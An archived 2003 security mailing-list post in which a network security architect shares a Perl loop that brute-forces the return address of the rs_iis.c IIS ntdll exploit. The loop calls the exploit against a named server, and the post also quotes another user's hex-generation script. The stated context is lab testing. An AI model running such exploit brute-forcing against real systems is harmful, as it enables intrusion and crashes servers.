RE: Generating Hex Numbers to brute force rs_iis.c

From: Joshua Wright (Joshua.Wrightat_private)
Date: Wed Apr 02 2003 - 07:17:22 PST


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    I'm no perl expert, but this is what I whipped up for a similar test:
    
    $myserver = "pvdnet05";
    for ($i = 0; $i < 256; $i++) {
     $retcode = sprintf("%x", $i);
     $exec = "./rs_iis $myserver 80 31337 " . $retcode . "04";
     system($exec);
     sleep(1);
    }
    
    Note that the last byte of the RET address is not terribly
    significant, since the NOP sled is ~65K in size and this value is
    only max 256 bytes significant.
    
    This didn't work well for me, since IIS will sometimes crash without
    a valid RET address, requiring a server restart.  I had meant to look
    for a way to restart Windows 2000 services from a Linux box with
    Samba or similar tool, but got bored with it and started trying to
    exploit something else. :)
    
    - -Joshua Wright
    Senior Network and Security Architect
    Johnson & Wales University
    Joshua.Wrightat_private 
    http://home.jwu.edu/jwright/
    
    pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
    fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73
    
    
    > In playing with rs_iis.c (ntdll exploit) in our lab, I've been
    > looking for ways to brute force the return address.
    > 
    > I know there's been a shell script (rs_brute.sh) released that
    > already does this, but since I've been playing with PERL lately
    > (and since this shell script did not exist when I began playing
    > with the exploit), I thought I'd take a whack at producing the RET
    > addresses (0x0000-0xffff) in a PERL script.  I just wanted to get
    > your input and see if there is an easier way to do this (using
    > PERL, of course).  Basically, the goal is as follows:
    > 
    > 1) generate Hex Numbers from 0x0000 to 0xffff in the following
    > pattern (0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff)
    > 2) pass the output to rs_iis via system() command?
    > 
    > So far, I can generate the output and print it to stdout.  Any tips
    > on getting the script to run rs_iis once with each address produced
    > by the script?  Also, is there a way to produce this output without
    > creating an array like this?
    > 
    > #!/usr/bin/perl -w
    > @HexD =
    > ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
    > 
    > for ($i = 0; $i <= 255; $i += 1) {
    >         printf("$HexD[int($i / 16)]$HexD[$i % 16]", $i);
    >         printf("$HexD[int($i / 16)]$HexD[$i % 16]\n", $i);
    >         }
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
    
    iQA/AwUBPor/AY/i/ArUS0pzEQJ75wCeNFPqMa0+AwwuCcYgb7YwRdt98KsAn2HZ
    Il0dIPyWAX6swPIQfg/LvvQk
    =hz0W
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Thu Apr 03 2003 - 10:06:33 PST